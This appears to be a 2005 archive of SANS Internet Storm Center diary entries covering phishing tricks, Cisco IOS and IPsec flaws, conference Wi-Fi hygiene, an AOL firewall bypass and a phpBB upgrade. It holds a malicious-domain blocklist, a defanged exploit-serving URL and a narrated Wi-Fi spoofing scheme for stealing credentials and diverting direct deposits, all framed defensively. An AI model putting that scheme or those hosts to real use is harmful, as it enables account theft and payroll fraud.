Diaries

Published: 2005-07-31

Another Phishing Trick; More Osama Messages; Crunchy-Gooey Security Designs

It's been a quiet day here in the land of the Net. Here are a few miscellaneous items that arrived in our mailbox recently.

Another Phishing Trick



Charles sent sent us a note about a phishing scam that used a relatively uncommon technique to attempt concealing the true location of the malicious link. The typical HREF link was enclosed in a FORM statement whose ACTION tag pointed to the phishing site. Although some mail clients may get confused by this, the latest version of Outlook Express does show the malicious URL when the mouse hovers over the link.

More Osama Messages



Ane wrote to us with concerns over malicious email messages with the subject "Osama bin Laden Captured." The message enticed the victim to visit a site that attempted installing a malicious executable. The use of such headlines to trick people is not new; however, there has been a rise in occurrence of such messages since June. We are not aware of these messages exploiting any new vulnerabilities, so you should be safe as long as:



1. Your Windows patches are up-to date

2. Your anti-virus is up-to-date

3. You do not click on suspicious email attachments or links



Today's points out that they've witnessed the Bobic worm "being seeded in emails claiming that Osama Bin Laden has been captured."

Crunchy-Gooey Security Designs



David told us about a New York Times article titled
. The article talks about security assessment projects conducted by Mark Seiden. The article mentions the familiar metaphor of many security infrastructure designs that "have this hard, crunchy outside, but they're very gooey and soft inside." One of the most difficult aspects of protecting such networks comes up during incident response: during the investigation one finds a plethora of logging information on perimeter devices. In contrast, internal systems often do not capture enough auditing details to allow the incident handler to determine what happened and why.



Lenny Zeltser

ISC Handler of the Day

http://www.zeltser.com

0 Comments

Published: 2005-07-30

Who needs .info/.biz, anyway ? ; Cisco IPV6 vuln ; NIST minimum security requirements

Who needs .info/.biz, anyway ?



After spending a couple of hours following up on a malware incident late Friday night, I have come to the conclusion that ICANN could do us all a tremendous favor by pulling the .info and .biz Top Level Domains (TLDs). It strongly looks to me as if 98% of all domains underneath these two TLDs belong to nefarious web sites in one of the countries-where-ISPs-ignore-all-complaints (CWIIAC).



Some companies have started to zapp all access to .biz and .info, and to white-list those that the users really need (www.mta.info being near the top of this list if your shop is near NYC). If you are not white-listing yet, here's a couple URLs which, in my personal opinion, you might want to consider adding to your blocklist:


*.komforochka.info
*.dlyasvobornyx.biz
*.all-answers.info
*.iframeprofit.biz
*.total-search.info
*.our-counter.biz

While you're at it, you might want to check your logs for access going to hXXp://195.225.176.25. This site is a particular "friend" of mine, it has been around since February or so, and is of course located in one of the CWIIAC. Currently, the site is serving up IE exploits from hXXp://195.225.176.25/user.scripts/u217/dir38500256.cgi, but I wont be surprised if this URL has already been shifted by now. The site itself and the exploits it contains will likely stay, though, as long as Ukraine is among the CWIIAC.



Time Zone & DST



As one more proof that sysadmins do not need additional time zone confusion, Johannes Ullrich has checked the submissions to DShield. Most of the submissions that can be verified are right on time - those that aren't, though, are not off by measly minutes, they are off by n*60 minutes, hence entire Timezones. See http://isc.sans.org/timeshiftgraph.php for a glimpse of pure timezone joy.

Cisco IPV6 Vulnerability



Cisco have updated their advisory today, see http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml . The advisory stresses that the problem cannot be exploited from more than one hop away, but I'm not quite sure I would bet too much on that one if my routers had IPv6 turned on. Carefully checking the list of vulnerable IOS releases and patching if necessary sure sounds like the better strategy than to wait until somebody shows that the attack also works across "one hop" for disconcertingly large values of "one".

NIST Minimum Security Requirements Paper



NIST have put a draft paper on minimum security requirements for federal information systems on the web a couple of days ago: http://www.csrc.nist.gov/publications/drafts/FIPS-200-ipd-07-13-2005.pdf
While not everything in the paper is equally useful, I quite like the section titled "Specifications for Minimum Security Requirements", starting on page 2. A brief but encompassing paragraph touches on 17 areas of importance to Information Security, ranging from (AC) Access Control to (SI) System and Information Integrity. If you're drafting an information security budget or program for next year at the moment, glancing through this list might help you to get your priorities straight.
---------------

Daniel Wesemann

EMail: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'

0 Comments

Published: 2005-07-29

Lynn's Cat is Out of The Bag; Cisco IPv6 Advisory; Log Juggling Courtesy of US Congress


Lynn's Cat is Out of The Bag


While Black Hat may have torn out paper pages, the PDF of Michael Lynn's
presentation, "The Holy Grail: Cisco IOS Shellcode and Exploitation
Techniques," lives on. Given the amount of attention this thing has gotten,
mirrors and links to it are now all over the place.



Responsible disclosure or not, there is no excuse not to upgrade IOS if you
haven't recently. Details on this are provided in today's ........(look a the
next bit)


Cisco IPv6 Advisory.


http://www.cisco.com/en/US/products/products_security_advisory09186a00804d82c9.shtml


Cisco has released the above advisory stating that all un-upgraded IPv6
configured routers are vulnerable to DOS and possible shellcode execution. According to Cisco:

all Cisco devices running any unfixed version of Cisco IOS
code that supports, and is configured for, IPv6. A system which supports IPv6,
if not specifically configured for IPv6, is not affected"



Additionally an example of Cisco shellcode was recently brought to our
attention that DOES work against the versions stated in the code. It is against
an old integer overflow vuln via the HTTP service. While this code is a couple
of years old, it is still an example of what is possible. Please don't ask me
for a link to it. It's publicly available for those who look & I'm not into
having to defend linking to 3v1L code.



As I said earlier, there is no excuse not to upgrade IOS if you haven't
recently.


Log Juggling Courtesy of US Congress



I have a pet peeve. Oh, ok...alot of pet peeves. I'll try to stay focused on
one at a time. Timezones...what a silly idea. "We'll hold that conference call
at 1500." AM or PM? What TZ? What month? When do you change to Daylight Saving
Time? When do I? And the the US Congress decides that moving little black
pointers on a white and black disc on my wall will save oil. I've got a better
idea. When the sun is at the zenith over some uninhabited point in the middle
of the Atlantic (allright - the Pacific), we'll call it 0000 hours.
Everyewhere. Argue about it all you want, it's like changing to the metric
system. It works and there is no more ambiguity.




*poof* Oh, I was dreaming. We are governed by peoples (yea, peopleS. Lot's of
different groups of people, worldwide) who believe that we are too stupid or
intolerant of change to make that work. Now, in steps the US legislators, who
further think that - well, I don't know what they think. They have decreed,
though, that as of this year, the parts of America that do the DST shuffle will
hold off until November 30th, and then "spring ahead" again a month earlier,
too. See for House of Representatives Bill 6 and all the gory details. I used tinyurl since the real URL is a mess. Why does this matter to a security geek like me?




One of the great annoyances I have to regularly deal with when corellating logs
from various systems is clock sync and the lack thereof. A few months ago I
spent a fair bit of time putting together a bunch of Perl just align the
timestamps from boatloads of files from various systems, and found that we were
dealing with things like ±18000 seconds from boxes with or without proper TZ
settings. In other cases we had DST (Daylight Saving Time) vs non-DST systems
off by roughly 3600 secs.




Once we got all the boxes in question mapped to their offsets, it was a simple
matter of running the collected data through the scripts using our uber-l33t
host/logtype/offset matrix (down, Ed!). We had built enoug fudge factor in to
cope with clock drift, so we didn't need to redo the offset numbers more than once.




Jump ahead to November 1, 2005. What the h4ck! Some systems will need a shift
by 3600 seconds again! The machines that didn't get the "I'm sure it's coming.
Just wait" Microsoft/Novell/*n*x patch will stand out as the only ones that
didn't hold off. They will all be at GMT-0500, when everything else will still
be basking in the sunshine of -0400.




Cool! This may very well be the first US Government legislated aid to patch management! Just watch the timestamps of outgoing email & sick the local admins on 'em. Maybe they should legislate a new time shift every second Tuesday of the month. :-p



Cheers!



g
Published: 2005-07-28

More Cisco/Blackhat

Cisco/Blackhat



We did receive quite a bit of input about Michael Lynn's presentation about the
Cisco flaws. Beyond what was reported in the press, we have nothing new/different
to add. It looks like things will move to the courts.

The quick summary: Michael Lynn talked about how to better exploit known
flaws in Cisco IOS. He did not talk about any new / 0 day vulnerability. However,
with his work it could be easier to write exploit code that will change router
settings or run arbitrary code. Most of these techniques have been discussed before, but the presentation put a lot of them in an easier to understand content.

What does it mean for companies running Cisco equipment: Patch. It is possible that some flaws, which where considered 'DOS only' flaws at this point, can be
used to execute code on the router. Cisco routers may attrack more attention
as a result of the presentation (not like they got left out of the games so far).

So again: Nothing fundamentally new, but a new quality of exploitation. At this point, its more of a legal issue then a technical issue.

Some links that go into more detail about the affair:

http://blogs.washingtonpost.com/securityfix/

http://www.securityfocus.com/news/11259
Feel free to voice your opinion in our , but keep it civil (the forum is moderated, and now email addresses are obfuscated).

Windows Genuine Advantage update


Update to windows genuine advantage.
One reader pointed out that despite microsoft's asserting to the contrary this "patch" could be backed out. I won't be providing the details. Donald Smith
Published: 2005-07-27

Pirates and Patches blackhat censorship? IPsec vulnerabilies adding up; Ethereal vulerabilities; Who's SAPing you

MicroSoft no longer providing patches to pirates




If you visit windowsupdate today you will probably be invited to install.

Windows Genuine Advantage Validation Tool (KB892130)
From the microsoft website:

"The Windows Genuine Advantage Validation Tool enables you to
verify that your copy of Microsoft Windows is genuine. The tool validates
your Windows installation by checking Windows Product Identification and
Product Activation status. After you install this item, you may have to restart your computer.
Once you have installed this item, it cannot be removed."

"Concerned about privacy? When you check for updates, basic information about your computer,
not you, is used to determine which updates your programs need.
To learn more, see our privacy statement."



This last statement is intended to address privacy issues. While a "nice" statement many of us
would like to know EXACTLY what is collected and transmitted to microsoft by this licence tool.
In my opinion Microsoft is well within their rights to require licence proof before providing patches.

Ethereal vulnerabilities



Upgrade to 0.10.12. Right now! Or at least before you need to use ethereal again.
Due to the severity and scope of the defects
that have been discovered, no workaround is available.


Who's SAPing you


A vulnerabiltiy was announced for SAP/r3

The vulnerability is caused due to an input validation error in the
Internet Graphics Server (IGS) subcomponent when processing document paths.
This can be exploited to access arbitrary files on the system outside the
web root by supplying a document path containing a directory traversal sequence (../).
The vulnerability has been reported in SAP prior to version 6.40 Patch 11.

BlackHat censoring?




This comes from a blog so take it for what it is worth.


The first "scandal" to emerge from Black Hat 2005 (so far, at least)
is the omission of some 30 pages of text from the 1,000-page-plus conference
presentation materials, which were handed out to conference attendees when
they registered on Tuesday. The missing pages -- literally ripped from the
massive handout -- apparently detailed the specifics of a serious security flaw
present in Cisco Systems routers, devices
that route the majority of Internet traffic on the Web today


The only "official" comment on the missing pages on the Cisco flaw
was a photographed copy of a notice distributed with each bundle of
conference materials. The notice states:
"Due to some last minute changes beyond Black Hat's control, and
at the request of the presenter, Michael Lynn,

the included materials aren't up to the standards Black Hat tries to meet.
Black Hat will be the first to apologize. We hope the vendors involved will follow suit."


Who is Mike Lynn?
Mr. Lynn is a well known vulnerability researcher for Internet Security Systems,
He is credited with finding several vulnerabilities in cisco products.

He is quoted here on router worm potential.




Our own Joshua Wright states
Note that Mike Lynn was going to present on exploiting IOS to use vulnerabilities in code
to run arbitrary code of the attacker's choosing. This is a huge deal, since a problem
with IOS that was formerly limited to a DoS could be leveraged to add configuration
commands to the IOS configuration, or other nasty things.



UPDATE!


Mike resigned from ISS and gave his talk.

"Cisco respects and encourages the work of independent research scientists;
however, we follow an industry established disclosure process for communicating
to our customers and partners, the company said in a statement released Wednesday.
It is especially regretful, and indefensible, that the Black Hat Conference organizers
have given Mr. Lynn a platform to publicly disseminate the information he illegally obtained."

Further Update


Based on what I have read this is basically adding a whole new demention to the router exploit field.
Remote code executation via buffer overflow. That in general has not existed in the cisco world because no one had developed it. In the past most router vulnerabilities were denial of service vulnerabilities.
See

for additional details on this event.

AH MAC vulnerability in freebds





II. Problem Description
A programming error in the implementation of the AES-XCBC-MAC algorithm
for authentication resulted in a constant key being used instead of the
key specified by the system administrator.

III. Impact
If the AES-XCBC-MAC algorithm is used for authentication in the absence
of any encryption, then an attacker may be able to forge packets which
appear to originate from a different system and thereby succeed in
establishing an IPsec session. If access to sensitive information or
systems is controlled based on the identity of the source system, this
may result in information disclosure or privilege escalation.

Patches available here:


Combined with the ESP ipsec vulnerabilty NISCC announced this negates
their recommended mitigation (add ah to esp).

Published: 2005-07-26

ClamAV vulnerability; Con-fu

Clam AntiVirus vulnerability



A vulnerability was discovered in the popular open-source anti-virus
scanner Clam AntiVirus. Many people are running this on their mail
servers, so make sure that your e-mail administrators update to the
latest version. Vulnerability details here:


http://www.osvdb.org/displayvuln.php?osvdb_id=18259


Con-fu



Many of you might be attending the security conference Black Hat and/or
Defcon this week. I decided that it might be good to put up some tips
for computer security when attaching to the wireless networks there. Of
course, you can use these tips for any other untrusted network. Feel
free to send us your tips also.



I have a couple of Linux machines running at my house. So I have found
that the safest way to hit the Internet is to tunnel everything through
SSHD at my home network.



My first suggestion: if you absolutely don't need to connect, then don't
take the risk. Just keep your laptop in your hotel room for emergencies
and you won't have to deal with the inevitable frustration of the
wireless network going down. Yes, you may have some envy as you see
everyone else geeking out in the hallways. But you will have the added
advantage of being unencumbered as you head to the bar/pool/casino
tables later.



Second major point: if you have a Windows laptop that is work-related,
you may want to seriously consider not attaching it to the networks
there. Consider all of the different software on your machine that will
be trying to connect to IP addresses inside your organization:
anti-virus updates, NetBIOS shares, etc. You would be surprised how
persistent the software loaded on your Windows laptop is nowadays and
all of this traffic is information leakage over a hostile network. At
the office or at home, this information leakage probably isn't a big
concern, but when you are attaching to a very well monitored network you
should think twice about it.



THINGS TO EXPECT:



*) The wireless network will go down... often. Despite the best efforts
of the organizers, it is very difficult to keep the wireless network
up and working.


*) There is all sorts of games that are played upon the wireless
network. Fake access points go up and down. Rogue DHCP servers
answer to requests. The routers get hammered with DoS attacks.


*) Expect weird DHCP and DNS stuff to happen.


*) Finally, try to recall all of the attacks you have seen in the last
year and dismissed because the attacker needed to be local to your
network. Then realize that you are about to connect to that network.

BEFORE YOU LEAVE:



*) Regardless of OS, make sure your laptop is patched. If running
Linux, make sure your kernel is current/patched.


*) Double check your firewall settings from another machine.


*) Setup SSHD on the proxy machine that is running on a port different
than 22. I would keep it below 1024 to ensure that a root-owned
process is running the daemon.


*) Hard-code your proxy box IP address into your hosts file on your
laptop. This prevents DNS hijacking at the conference.


*) Verify that your SSHD allows public key authentication only. If you
didn't already have it setup, generate a public/private keypair on
your laptop. Also, make a note of your server's public key on your
laptop to reduce any question of man-in-the-middle attacks
later.


*) Verify that your SSHD only allows SSH protocol version 2.


*) Setup a Squid proxy server on that box. This will allow you to proxy
HTTP and FTP traffic.


*) Configure another machine to log all attempted connections to the
destination box running your SSHD. This is just for you to review
later when you get home and see if anybody was watching you connect
to your daemon.


AT THE CONFERENCE:



*) When you get to the conference, try to hard-code the MAC address of
the default router. Use the arp command to do this. The MAC
addresses of the routers are usually published at Black Hat.


*) After booting your laptop, SSH to your proxy box and setup port
forwarding. ssh -L3128:localhost:3128 <username>@<proxy_ip>.


*) After the SSH tunnel is up, make sure that your web browser is using
the proxy address of 127.0.0.1:3128. This will force all of the web
browser traffic to transcend the SSH tunnel and get handled by the
Squid proxy server. For command-line applications on UNIX, you can
sometimes set the http_proxy and ftp_proxy environment variables to
the proxy IP address.


*) With all of this in place, I would still be very hesitant about
connecting to corporate e-mail systems (especially Outlook Web
Access). Do you really want to put your organization at risk by
connecting to these systems and having someone shoulder-surf your
email?


*) Do you believe strongly in your VPN client? That's great. But why
put your organization at risk by showing everyone else the IP address
of your VPN gateway?


*) If you are running Windows, consider the following additional
measures to prevent information leakage from NetBIOS broadcast
traffic...


*) Turn off Client for Microsoft Networks.


*) Turn off File and Printer Sharing.


*) Turn off NetBIOS over TCP/IP.


*) Consider changing the domain name and machine name of your computer.



[end]

0 Comments

Published: 2005-07-25

Top20 List Updated; TCP/1433 Remains Elevated; ZoneAlarm 6.0 Released; The Penetrating Packets: Spam E-Mail

Top20 List Updated



The SANS Top 20 Internet Security Vulnerabilities list was updated today with information for the 2nd quarter of 2005. See the current information
.




TCP/1433 Remains Elevated



We continue to see an increase in probes on TCP port 1433. If you have any interesting packet captures, please submit them
.




ZoneAlarm 6.0 Released



The entire ZoneLabs ZoneAlarm product family has been updated. Version 6.0 of each of the products was released a couple of days ago. For more information, go
.




The Penetrating Packets: Spam E-Mail



Background: What Happened?



Last week, I was awoken early in the morning by a ringing cell phone. A co-worker was calling to say that they hadn't received any email in about 6 hours, which for them was unusual. I got up, went downstairs, got online, connected to our relay email server, checked the queue and was immediately wide-awake when I saw that there were 150,000 plus messages sitting in our email queue waiting to be processed. That's outside the normal scope of our queue size by just a tad ;-)

So I started digging through the messages in the queue looking to see if I could figure out the problem. I knew our email server was not an open email relay (or at least it hadn't been yesterday). I saw that most of the email had "From:" and "To:" headers involving domains in China and Taiwan. None of the obvious spam email was to or from any of our domains or addresses.

Ok, so why was the email being accepted by our server? I noticed that the values in the "From:" and "To:" fields were using the Big5 character set and started wondering if perhaps this was a new trick of spammers to get around SMTP header filters on email servers. So I shutdown the email server and start working to clean out the queued spam email.

Several hours later, I have the queue reasonably cleaned up and restarted the email server to start processing email ... and see the queue immediately start to accumulate lots of fresh spam. All right, what's going on here?!?!

Research: Where's It Coming From?



So I started looking through the logs further and realized that all this spam email wasn't coming from the Internet ... it was coming from our internal email server used by employees to send/receive email. Checking the logs on that email server, I saw LOTS of SMTP connections from our SSH gateway. In order to access the end-point email server from outside the office, employees needed to connect through an SSH tunnel. The computers on our local network are considered to be trusted by our relay email server and so it will accept any email from these computers no matter what the destination address is.

Ok, so this implied that the spam was coming through an employees computer. Killing off the established SSH connections of the dozen or so folks currently connected terminated the ongoing flood of new spam messages entering our system. Now to try to figure out where the problem computer is. We contacted each of the employees who had been connected at the time and one by one started ruling them out as the source. Almost everyone had a broadband Internet connection and was behind a hardware firewall which blocked connection attempts from the Internet from reaching their computer. The few folks without hardware firewalls had personal software firewalls on their computers and we verified that the firewall was working correctly. One down, another eliminated, and so on until, hey wait a minute, we just eliminated the last employee who was online this morning!!! So if everyone had a hardware or software firewall that was correctly blocking connection requests from the Internet, how did someone connect to them? (Hint: It's a 3-letter word).

Back to the logs to try to find an IP address that will hopefully match up with one of the IP addresses an employee had earlier in the morning. Most of the SPAM messages had forged HELO values that were completely bogus but some had IP addresses and after lots and lots of searching , I got a match with someone who was connected throughout the night when the spam flood was ongoing.

Solution:



So I contacted the suspected employee again and we went through the firewall settings. The problem turned out to have two parts.

Part 1 - Contributing Factor: When you setup SSH tunnels on your local machine to connect to a remote server, you usually associate the listening port with your local loopback adapter. Thus, only processes on your computer can connect to the tunnel endpoint and be connected to the whatever is on the far end. You can configure many SSH clients to bind the listening port to *ALL* interfaces on your computer (which will include any Ethernet or Wireless interfaces). In such cases, a remote user could then initiate a connection request to the tunnel port on your computer (if not blocked by a firewall) and go through the tunnel to whatever is on the remote end.

As it turned out, this employee's SSH client was so configured to bind tunnel end-points to all interfaces instead of to just the loopback adapter, thus creating the potential for a problem. But still, the hardware and software firewalls should have prevented such connections. What happened?

Part 2 - The Culprit: In the first "Die Hard" movie, Hans Gruber says "You asked for a miracle. I give you the F.B.I." Today, I say "You asked for a culprit. I give you the A.O.L."

If you have an existing Internet connection and then run the AOL software to have access to AOL content, you are in fact, setting up a VPN across the Internet between your computer and the AOL servers. If you run "ipconfig", you will see that you now have an additional virutal Ethernet adpater that has an IP address that is from AOL. When you access any AOL content, the packet comes from your computers virtual AOL IP address and is encapsulated in a packet that comes from your computer's real IP address. The responses from AOL come back in an encapsulated packet as well.

So how does this help someome bypass your firewall? Your computer has two IP addresses while you are connected to AOL. IP Address 1 is the real one and IP address 2 is the virtual one from AOL. An attacker who tries to connect to your real IP address from the Internet will be blocked by either your hardware or software firewall (if you haven't configured a hole for that type of traffic). But what happens if they scan AOL's network and happen to try to connect to the IP address that AOL has currently assigned to you? AOL will accept the traffic, determine who currently has that IP address and then encapsulates that packet inside of a new one that it addressed not to your virtual AOL IP address but to your real IP address. Because you established the connection to AOL, your firewall has tagged this as an established connections and so any data coming back is considered to be part of an approved, established connection as well and is allowed to pass through your firewall.

Moral:



Make sure you know what software you have installed on your computer and how it is configured. Defense-in-depth doesn't help if you have provided an access path that bypasses all of your defenses.
Published: 2005-07-24

How you can help; Strange Spam Update; port 3001 update

"How can I help?"



Here at the ISC, we occasionally get a note from a reader wanting to know how
they can do something to help out around the place. While we typically point
them in the direction of DShield < http://www.dshield.org/howto.php > and
remind them that the ISC thrives on reader submitted activity and reports;
There is a new thing that you, the reader, can do to help out, if you're so inclined.
The BleedingSnort folks have a new "Spyware Listening Post" project they're
working on, and they have put out a call for volunteers.
< http://www.bleedingsnort.com/article.php?story=20050724144916974 >
Granted, this isn't ISC related, but it's a neat little project, and definitely provides
a good starting point for all those readers who want to write the next "Follow The
Bouncing Malware" series but don't quite know where to start, or those who just
want to get a better handle on what's going on in the netherworld of spammers,
botnets, con-artists, and marketers.

"Strange Spam" update



It appears that the weird "1.txt" spams people are getting are being sent from
systems compromised with one of the Bagel trojans; or so we hear from several
of our readers.

Source port 3001 update


Reader Jason L. writes in about a tool he's been tracking for a while now that
spoofs scans from unused IP addresses with source port 3001 and TCP ID 26127.
Anyone have an idea what tool this is? If so, we'd love to hear about it over
in our shiny new discussion forum! < http://forum.dshield.org/list.php?3 >

0 Comments

Published: 2005-07-23

Strange Spam; Update on Port 3001; New Discussion Forum; Small Website Change; Cisco Humor; SANS Washington DC

Strange Spam

We have not figured out the source or reason of the strange spam reported in the Handler's Diary. It's clear that at the MTA level the spam is coming from many different sources, which is typical of spam generated by compromised computers. But who/what is behind it and what it means is still a mystery.

Update on Port 3001

Our report yesterday that tcp/3001 was rising needs a bit of clarification. It's the SOURCE port that is rising, not the DESTINATION port.



David dropped us a note that said, "It seems that there is a tool or malware that uses a default source port of 3001. I noticed this on a dest port 1666 scan and started looking around and noticed the source port 3001 similarity. Below are some common scans where all scans performed were *only* from source port 3001. I searched through my firewall logs going back to December and then got a list of IP addresses using source port 3001 then filtered out those that weren't using port 3001 exclusively. Below is a list of ports and the count of instances.


29 1433

18 42

84 6101

Looks like there is something out there scanning for SQL, WINS and Veritas possibly using a specific scanning tool."

New Discussion Forum

The SANS Internet Storm Center's CTO, Johannes Ullrich, has created a new web view into the popular DShield discussion list. Additionally, he built a new online discussion forum for those who want to openly discuss items in the Handler's Diary. The site for both forums is at
http://forum.dshield.org and we hope to hear from everybody over there! (Remember that these are PUBLIC forums, anything you post can and will be read by others. If you want to send the Storm Center something in confidence please use our contact form at http://isc.sans.org/contact.php and tell us by using the check blocks at the bottom whether we can release your name and other details.)

Small Website Change

We've made a small change to our website. It now has a <meta http-equiv="refresh" content="600"> tag so that it will automatically fetch an update every 10 minutes. That way you can leave it open in a browser tab (you DO use tabs, don't you?) and it will stay up to date without manually refreshing.

Cisco Humor

SANS Instructor Chris Benton stumbled on a site that will bring a bit of humor to our otherwise busy lives. Check out http://routergod.com and read insightful articles such as

- Paris Hilton On CCIE Storage

- Gillian Anderson on LAN Switching

- Gunney Sgt. Hartman at CCNA Boot Camp

- Paul Hogan Tells Us About HSRP

- Arnold on PIX Turbo Access Lists

- Trinity on IP-Helper addresses

- Agent Smith Explains Syslog

- Charles Manson On Static Routes

- Mister Rogers on the RS 232

- 7 of 9 on OSPF


SANS Washington, DC


I'll be teaching SEC 401, SANS Security Essentials, in later next week. If you can stop by, please do so to say hello. A few of the handlers will be there and we always like to meet our readers! There is still plenty of time to register if you haven't already done so. This is a great time of year to come see Washington with your family. It's hotter than hootie tootie but that's why we Southerners invented air conditioning! :)




Marcus H. Sachs

Handler on Duty

Published: 2005-07-22

Port 1433 TCP scanning is up!; Firefox 1.0.6 available - Critical Update; MySQL patches zlib remote vuln; Glitch in The Matrix - Port 2100; One RingTone to Rule Them All?; SlimFTPd vuln PoC released;

Firefox 1.0.6 available - Critical Update

Shane Castle just sent a note to us that Firefox 1.0.6 is out. Thanks Shane!


And contributor Don Thornton sent us the following information - "Firefox 1.0.6 is a stability fix, not a security fix. It's marked critical because of the number of problems reported using 1.0.5. According to the release notes at
the only thing changed in this version was to "Restore API compatibility for extensions and web applications that did not work in Firefox 1.0.5." Thanks Don!

MySQL patches zlib remote vuln

MySQL Vendor Information



Security improvement: Applied a patch that addresses a zlib data vulnerability that could result in a buffer
overflow and code execution. (CAN-2005-2096) (Bug #11844)

Secunia Advisory: SA16170
Release Date: 2005-07-22
Highly critical
Impact: DoS
System access
Where: From remote

Solution Status: Vendor Patch
Software: MySQL 4.x

Glitches in The Matrix

Port 1433 TCP scanning is approaching record highs.

Port 2100 (Oracle XDB) scanning has been seen spiking/increasing at DShield, REN-ISAC and the MyNetWatchman reporting sites.

Port 3001 is rising too.

Please participate and submit any unusual activity or captures! Thanks!

One RingTone to Rule Them All?

MobileATM application concerns.

John Leyden has another interesting Register article -
- that covers British Bank deployment plans for MobileATM and discusses a security consulting firm's experience testing similar mobile-phone application security.

The security consulting firm bases it's "warning on tests of other mobile Java applications on behalf of several clients in the mobile gambling market rather than on the MobileATM service, which it hasn't tested. Ken Munro, managing director of SecureTest, said the comparison is appropriate because the same type of technology and distribution methods are applied in both cases."

I note here that my use of "RingTones" as a title is editorial license, there is no connection between RingTones and the security issues covered in the article, yet ...

PoC has been released for the SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability

- "have buffer overflow vulnerabilities that could potentially lead to remote code execution. The exploits are only possible if the remote user can successfully log in. Users are advised to upgrade to SlimFTPd 3.17 immediately!"

Vuln Announcement at FrSIRT -

New Spam Details

Eric Conrad, Jim Slora, and an anonymous contrubitor sent information about new spam they're seeing at their networks today. The spam has the following characteristics;

"The Subject line is merely "1", the forged mailfrom is approximately the first 8 characters of the target address plus a forged domain. There is an attachment called "1.txt" and a message text body that begins on a new line "ICA=" plus three characters, the first one of which may be low-bit ASCII and the second two are low-bit or high-bit.

The sources include zombie networks, normal mail servers, and bounced messages from normal servers."

Thanks for the analysis and submissions folks!

Patrick Nolan
Published: 2005-07-21

MS05-036 Color Management Exploit Code in Wild; mod_jrun exploit scanning from Europe; Insecure by Design

MS05-036 Color Management Exploit Code in Wild



We've received reports that the Color Management Module ICC Profile Buffer Overflow Vulnerability has exploit code available and is being used out in the wild. The vulnerability information from Microsoft is available over at . The mitigate this vulnerability, apply the appropriate patch. It appears that this version of the exploit code will only crash the browser, but it wouldn't be difficult to put in code for execution. put out an advisory on the code being in the wild this morning.

mod_jrun exploit scanning from Europe



A reader sent in an email with the observation of a large increase in mod_jrun exploits being thrown at webservers. Has anyone else seen similar behavior or problems and, if so, an IP list of sources and the specific attacks being used?

Insecure by Design



*Disclaimer* - This won't be as interesting as Tom's FTBM. Sorry. I'm not that creative. I can do haiku, that's about it.

Let's say at a fictional organization, they offer wireless for their clients, employees, guests, and so on. In a town that has free wireless almost everywhere, it's almost a political necessity to offer wireless, despite the security issues. At first, the required all wireless users to authenticate through a VPN server and then have full and complete access to the internet. Some complained and they developed an economy solution that uses a username and password to authenticate via a webserver and then you get limited access to the internet. Not secure, no... but a compromise, if not for one thing.

The password the users have to use and type in is the master password for a multiple logon environment. This password controls all others and allows you to change them, including the password that controls, say, direct deposit for employees. Say you want to make some money. Here's how you do it.

Remember airpwn? Allegedly the only interesting thing out of this year's DefCon? It shows you that if you are on the same subnet as someone, you can always respond to their requests faster than a remote server. So, when someone walks up, sits down, and fires up their web browser, your evil hacker machine sends a request with a "fake" webpage back to the user. Sure, you might have the real webserver using SSL, but would an end-user really check to make sure their session is encrypted? Would you? If you answered yes, you are either working for a 3-letter security agency or aren't being honest with yourself.

They send you their credentials, you have them tunnel through you out to the Internet. Everyone is happy, no one suspects a thing. Then you wait til a day or two before the end of the month for payday. You start changing direct deposit information. Money comes in, you get out of town. Sure, that's crude and you'd get caught, but I'm not an expert in laundering money.

The point is, if you are going to offer wireless, it will be insecure if you don't tunnel it through a VPN and even then could have problems. The second point is, if you are going to choke down that risk, please don't make the users authenticate with credentials that means something and give them access to anything important. The information is easy enough to steal and there are plenty of 14 year olds out there with laptops wanting to try.

-----------

John Bambenek

bambenek -at- gmail -dot- com

(insert obligatory 'ph' joke here)
Published: 2005-07-20

Google Strangeness: Is It New?; Filthy Minkey; New phpBB; FTBM VII: Afterglow

Google Strangeness: Is It New?


While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.



I was talking to the Gypsy and his filthy minkey...


If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for a remote file viewing exploit is forthcoming. More info is available at the GreaseMonkey site:



http://greasemonkey.mozdev.org/


phpBB 2.0.17 released


This newest release fixes some security issues due to XSS and adds some new functionality.



URLs:

Announcement:

- http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=308490

Tutorial for heavily modded boards:

- http://www.phpbb.com/phpBB/viewtopic.php?t=308426

Downloads:

- http://www.phpbb.com/downloads.php



Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:



1. Make backup
# cp -r <forum> <backup>

2. make sure the backup is offline (contains vulnerable code)
# chmod 0 <backup>

3. Patch the files

Patching or copying of the replacement files.
Modded boards need to do this very carefully.

admin/admin_ug_auth.php
- the pending list for groups.

admin/admin_users.php
- escaping of the username

includes/bbcode.php
- the XSS issue:
less liberal acceptance of exotic chars in URLs
will break I18N domain names (might not be that bad after all)
[Funny, I remember this code being change in 2.0.16 as well]
still it seems to match now (e.g.)
#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is
which still allows a lot to match to something of the format of
[url=xxxx://www.phpbb.com]phpBB[/url]

includes/functions.php
- unclear, my knowledge of php & their code is lacking

diff:
9c9
< * $Id: functions.php,v 1.133.2.35 2005/07/19 20:01:11 acydburn Exp $
---
> * $Id: functions.php,v 1.133.2.34 2005/02/21 18:37:33 acydburn Exp $

120c120
< if (!is_numeric($user) || $force_str)
---
> if (intval($user) == 0 || $force_str)

581c581
< define('HAS_DIED', 1);
---
> define(HAS_DIED, 1);

includes/functions_validate.php
- call clean function instead of
user name length limit (25 char) and escaping of single quotes.

includes/usercp_activate.php
- add test to see if the admin is doing the activation when needed

includes/usercp_viewprofile.php
- adding username in the search functionality of the
viewprofile control panel

privmsg.php
- big changes in handling of deletion of messages it seems

templates/subSilver/faq_body.tpl
- change a href from "#Top" to "#top"
Doing this properly would require making this change in ALL
installed templates, not just in subSilver. If you changed or
added templates this can be hard.

viewtopic.php
- adding username in the search functionality

4. copy script (kills board)
# cp -r <src dir>/contrib <forum>
# cp -r <src dir>/install <forum>

5. run database update script
http://<site>/<forum>/install/update_to_latest.php

6. remove script
# rm -r <forum>/contrib
